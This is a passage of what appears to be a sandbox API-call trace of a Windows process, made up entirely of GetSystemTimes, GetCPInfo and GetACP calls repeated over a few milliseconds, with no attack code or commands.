lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.589] GetACP () returned 0x4e4 [0170.589] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.590] GetACP () returned 0x4e4 [0170.590] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.591] GetACP () returned 0x4e4 [0170.591] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.592] GetACP () returned 0x4e4 [0170.592] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.593] GetACP () returned 0x4e4 [0170.593] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.594] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.594] GetACP () returned 0x4e4 [0170.594] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.595] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.595] GetACP () returned 0x4e4 [0170.595] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.596] GetACP () returned 0x4e4 [0170.596] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.596] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.597] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.597] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.597] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.598] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.598] GetACP () returned 0x4e4 [0170.598] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.599] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.599] GetACP () returned 0x4e4 [0170.599] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: 